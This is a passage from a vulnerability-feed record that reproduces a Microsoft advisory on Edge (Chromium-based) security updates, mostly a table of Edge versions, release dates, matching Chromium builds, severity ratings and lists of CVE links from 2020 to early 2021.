"https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-1020", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-10-03T16:29:41", "description": 
"**Please note:** Starting 1/21/2021, we will be releasing the Chrome CVEs that are included in the new releases of Microsoft Edge (Chromium-based) directly in the Security Update Guide. Please see [Security Update Guide Supports CVEs Assigned by Industry Partners](<https://msrc-blog.microsoft.com/2021/01/13/security-update-guide-supports-cves-assigned-by-industry-partners/>) for more information.\n\nThis advisory will be updated whenever Microsoft releases a version of Microsoft Edge (Chromium-based) which incorporates publicly disclosed security updates from the Chromium project. Microsoft will document separately any vulnerabilities in Microsoft Edge (Chromium-based), that are not in Chromium, under a Microsoft-assigned CVE number (see, for example: [CVE-2020-1341](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/cve-2020-1341>)).\n\n**History of Microsoft Edge (Chromium-based) Security Updates**\n\nMicrosoft Edge Version | Date Released | Based on Chromium Version | Highest Severity Fix in Release | CVEs \n---|---|---|---|--- \n87.0.664.75 | 1/7/2021 | 87.0.4280.141 | High | [CVE-2021-21106](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21106>), [CVE-2021-21107](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21107>), [CVE-2021-21108](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21108>), [CVE-2021-21109](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21109>), [CVE-2021-21110](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21110>), [CVE-2021-21111](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21111>), [CVE-2021-21112](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21112>), [CVE-2021-21113](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21113>), [CVE-2021-21114](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21114>), [CVE-2021-21115](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21115>), 
[CVE-2021-21116](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21116>), [CVE-2020-16043](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16043>), [CVE-2020-15995](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15995>)
87.0.664.57 | 12/7/2020 | 87.0.4280.88 | High | [CVE-2020-16037](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16037>), [CVE-2020-16038](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16038>), [CVE-2020-16039](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16039>), [CVE-2020-16040](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16040>), [CVE-2020-16041](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16041>), [CVE-2020-16042](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16042>)
87.0.664.41 | 11/19/2020 | 87.0.4280.66 for Windows and Linux, 87.0.4280.67 for Mac | High | [CVE-2019-8075](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-8075>), [CVE-2020-16012](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16012>), [CVE-2020-16014](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16014>), [CVE-2020-16015](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16015>), [CVE-2020-16018](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16018>), [CVE-2020-16022](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16022>), [CVE-2020-16023](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16023>), [CVE-2020-16024](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16024>), [CVE-2020-16025](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16025>), [CVE-2020-16026](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16026>), [CVE-2020-16027](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16027>), [CVE-2020-16028](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16028>), [CVE-2020-16029](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16029>), [CVE-2020-16030](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16030>), [CVE-2020-16031](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16031>), [CVE-2020-16032](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16032>), [CVE-2020-16033](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16033>), [CVE-2020-16034](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16034>), [CVE-2020-16036](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16036>)
86.0.622.69 | 11/13/2020 | 86.0.4240.198 | High | [**CVE-2020-16013**](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16013>) *, [**CVE-2020-16017**](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16017>) *
86.0.622.68 | 11/11/2020 | 86.0.4240.193 | High | [CVE-2020-16016](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16016>)
86.0.622.63 | 11/4/2020 | 86.0.4240.183 | High | [CVE-2020-16004](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16004>), [CVE-2020-16005](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16005>), [CVE-2020-16006](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16006>), [CVE-2020-16007](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16007>), [CVE-2020-16008](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16008>), [**CVE-2020-16009**](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16009>) *, [CVE-2020-16011](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16011>)
86.0.622.51 | 10/22/2020 | 86.0.4240.111 | High | [**CVE-2020-15999**](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15999>) *, [CVE-2020-16000](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16000>), [CVE-2020-16001](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16001>), [CVE-2020-16002](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16002>), [CVE-2020-16003](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16003>)
86.0.622.38 | 10/8/2020 | 86.0.4240.75 | High | [CVE-2020-6557](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6557>), [CVE-2020-15968](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15968>), [CVE-2020-15969](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15969>), [CVE-2020-15971](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15971>), [CVE-2020-15972](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15972>), [CVE-2020-15973](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15973>), [CVE-2020-15974](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15974>), [CVE-2020-15975](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15975>), [CVE-2020-15977](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15977>), [CVE-2020-15979](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15979>), [CVE-2020-15981](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15981>), [CVE-2020-15982](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15982>), [CVE-2020-15985](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15985>), [CVE-2020-15987](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15987>), [CVE-2020-15988](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15988>), [CVE-2020-15989](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15989>), [CVE-2020-15990](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15990>), [CVE-2020-15991](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15991>), [CVE-2020-15992](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15992>)
85.0.564.63 | 9/23/2020 | 85.0.4183.121 | High | [CVE-2020-15960](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15960>), [CVE-2020-15961](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15961>), [CVE-2020-15962](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15962>), [CVE-2020-15963](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15963>), [CVE-2020-15964](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15964>), [CVE-2020-15965](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15965>), [CVE-2020-15966](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15966>)
85.0.564.51 | 9/9/2020 | 85.0.4183.102 | High | [CVE-2020-6574](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6574>), [CVE-2020-6575](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6575>), [CVE-2020-6576](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6576>), [CVE-2020-15959](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15959>)
85.0.564.41 | 8/27/2020 | 85.0.4183.83 | High | [CVE-2020-6558](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6558>), [CVE-2020-6559](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6559>), [CVE-2020-6560](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6560>), [CVE-2020-6561](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6561>), [CVE-2020-6562](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6562>), [CVE-2020-6563](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6563>), [CVE-2020-6564](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6564>), [CVE-2020-6566](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6566>), [CVE-2020-6567](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6567>), [CVE-2020-6568](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6568>), [CVE-2020-6569](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6569>), [CVE-2020-6570](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6570>), [CVE-2020-6571](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6571>)
84.0.522.63 | 8/20/2020 | 84.0.4147.135 | High | [CVE-2020-6556](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6556>)
84.0.522.59 | 8/11/2020 | 84.0.4147.125 | High | [CVE-2020-6542](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6542>), [CVE-2020-6543](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6543>), [CVE-2020-6544](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6544>), [CVE-2020-6545](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6545>), [CVE-2020-6546](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6546>), [CVE-2020-6547](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6547>), [CVE-2020-6548](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6548>), [CVE-2020-6549](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6549>), [CVE-2020-6550](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6550>), [CVE-2020-6551](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6551>), [CVE-2020-6552](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6552>), [CVE-2020-6553](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6553>), [CVE-2020-6554](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6554>), [CVE-2020-6555](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6555>)
84.0.522.49 | 7/30/2020 | 84.0.4147.105 | High | [CVE-2020-6532](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6532>), [CVE-2020-6537](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6537>), [CVE-2020-6538](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6538>), [CVE-2020-6539](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6539>), [CVE-2020-6540](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6540>), [CVE-2020-6541](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6541>)
84.0.522.40 | 7/16/2020 | 84.0.4147.89 | Critical | [CVE-2020-6510](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6510>), [CVE-2020-6511](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6511>), [CVE-2020-6512](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6512>), [CVE-2020-6513](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6513>), [CVE-2020-6514](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6514>), [CVE-2020-6515](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6515>), [CVE-2020-6516](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6516>), [CVE-2020-6517](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6517>), [CVE-2020-6518](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6518>), [CVE-2020-6519](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6519>), [CVE-2020-6520](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6520>), [CVE-2020-6521](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6521>), [CVE-2020-6522](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6522>), [CVE-2020-6523](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6523>), [CVE-2020-6524](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6524>), [CVE-2020-6525](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6525>), [CVE-2020-6526](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6526>), [CVE-2020-6527](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6527>), [CVE-2020-6528](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6528>), [CVE-2020-6529](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6529>), [CVE-2020-6530](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6530>), [CVE-2020-6531](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6531>), [CVE-2020-6533](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6533>), [CVE-2020-6534](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6534>), [CVE-2020-6535](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6535>), [CVE-2020-6536](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6536>)
83.0.478.56 | 6/24/2020 | 83.0.4103.116 | High | [CVE-2020-6509](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6509>)
83.0.478.53 | 6/17/2020 | 83.0.4103.106 | High | [CVE-2020-6505](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6505>), [CVE-2020-6506](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6506>), [CVE-2020-6507](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6507>)
83.0.478.45 | 6/4/2020 | 83.0.4103.97 | High | [CVE-2020-6493](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6493>), [CVE-2020-6494](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6494>), [CVE-2020-6495](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6495>), [CVE-2020-6496](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6496>)
83.0.478.37 | 5/21/2020 | 83.0.4103.61 | High | [CVE-2020-6465](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6465>), [CVE-2020-6466](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6466>), [CVE-2020-6467](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6467>), [CVE-2020-6468](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6468>), [CVE-2020-6469](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6469>), [CVE-2020-6470](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6470>), [CVE-2020-6471](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6471>), [CVE-2020-6472](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6472>), [CVE-2020-6473](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6473>), [CVE-2020-6474](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6474>), [CVE-2020-6475](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6475>), [CVE-2020-6476](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6476>), [CVE-2020-6478](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6478>), [CVE-2020-6479](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6479>), [CVE-2020-6480](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6480>), [CVE-2020-6481](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6481>), [CVE-2020-6482](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6482>), [CVE-2020-6483](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6483>), [CVE-2020-6484](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6484>), [CVE-2020-6486](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6486>), [CVE-2020-6487](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6487>), [CVE-2020-6488](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6488>), [CVE-2020-6489](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6489>), [CVE-2020-6490](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6490>)
81.0.416.72 | 5/7/2020 | 81.0.4044.138 | High | [CVE-2020-6831](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6831>), [CVE-2020-6464](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6464>)
81.0.416.68 | 4/29/2020 | 81.0.4044.129 | High | [CVE-2020-6461](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6461>), [CVE-2020-6462](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6462>)
81.0.416.64 | 4/23/2020 | 81.0.4044.122 | High | [CVE-2020-6458](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6458>), [CVE-2020-6459](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6459>), [CVE-2020-6460](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6460>)
81.0.416.58 | 4/17/2020 | 81.0.4044.113 | Critical | [CVE-2020-6457](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6457>)
81.0.416.53 | 4/13/2020 | 81.0.4044.92 | High | [CVE-2020-6454](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6454>), [CVE-2020-6423](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6423>), [CVE-2020-6455](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6455>), [CVE-2020-6430](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6430>), [CVE-2020-6456](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6456>), [CVE-2020-6431](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6431>), [CVE-2020-6432](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6432>), [CVE-2020-6433](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6433>), [CVE-2020-6434](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6434>), [CVE-2020-6435](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6435>), [CVE-2020-6436](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6436>), [CVE-2020-6437](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6437>), [CVE-2020-6438](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6438>), [CVE-2020-6439](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6439>), [CVE-2020-6440](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6440>), [CVE-2020-6441](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6441>), [CVE-2020-6442](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6442>), [CVE-2020-6443](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6443>), [CVE-2020-6444](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6444>), [CVE-2020-6445](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6445>), [CVE-2020-6446](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6446>), [CVE-2020-6447](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6447>), [CVE-2020-6448](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6448>)
80.0.361.109 | 4/1/2020 | 80.0.3987.162 | High | [CVE-2020-6450](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6450>), [CVE-2020-6451](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6451>), [CVE-2020-6452](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6452>)
80.0.361.69 | 3/19/2020 | 80.0.3987.149 | High | [CVE-2020-6422](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6422>), [CVE-2020-6424](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6424>), [CVE-2020-6425](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6425>), [CVE-2020-6426](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6426>), [CVE-2020-6427](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6427>), [CVE-2020-6428](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6428>), [CVE-2020-6429](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6429>), [CVE-2019-20503](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20503>), [CVE-2020-6449](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6449>)
80.0.361.66 | 3/4/2020 | 80.0.3987.132 | High | [CVE-2020-6420](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6420>)
80.0.361.62 | 2/25/2020 | 80.0.3987.122 | High | [CVE-2020-6407](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6407>), [**CVE-2020-6418**](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6418>) *
80.0.361.57 | 2/20/2020 | 80.0.3987.116 | High | [CVE-2020-6383](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6383>), [CVE-2020-6384](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6384>), [CVE-2020-6386](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6386>)
80.0.361.48 | 2/7/2020 | 80.0.3987.87 | High | [CVE-2020-6381](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6381>), [CVE-2020-6382](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6382>), [CVE-2019-18197](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-18197>), [CVE-2019-19926](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19926>), [CVE-2020-6385](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6385>), [CVE-2019-19880](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19880>), [CVE-2019-19925](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19925>), [CVE-2020-6387](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6387>), [CVE-2020-6388](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6388>), [CVE-2020-6389](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6389>), [CVE-2020-6390](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6390>), [CVE-2020-6391](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6391>), [CVE-2020-6392](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6392>), [CVE-2020-6393](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6393>), [CVE-2020-6394](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6394>), [CVE-2020-6395](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6395>), [CVE-2020-6396](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6396>), [CVE-2020-6397](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6397>), [CVE-2020-6398](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6398>), [CVE-2020-6399](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6399>), [CVE-2020-6400](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6400>), [CVE-2020-6401](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6401>), [CVE-2020-6402](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6402>), [CVE-2020-6404](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6404>), [CVE-2020-6405](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6405>), [CVE-2020-6406](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6406>), [CVE-2019-19923](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19923>), [CVE-2020-6408](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6408>), [CVE-2020-6409](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6409>), [CVE-2020-6410](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6410>), [CVE-2020-6411](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6411>), [CVE-2020-6412](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6412>), [CVE-2020-6413](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6413>), [CVE-2020-6414](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6414>), [CVE-2020-6415](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6415>), [CVE-2020-6416](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6416>), [CVE-2020-6417](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6417>)
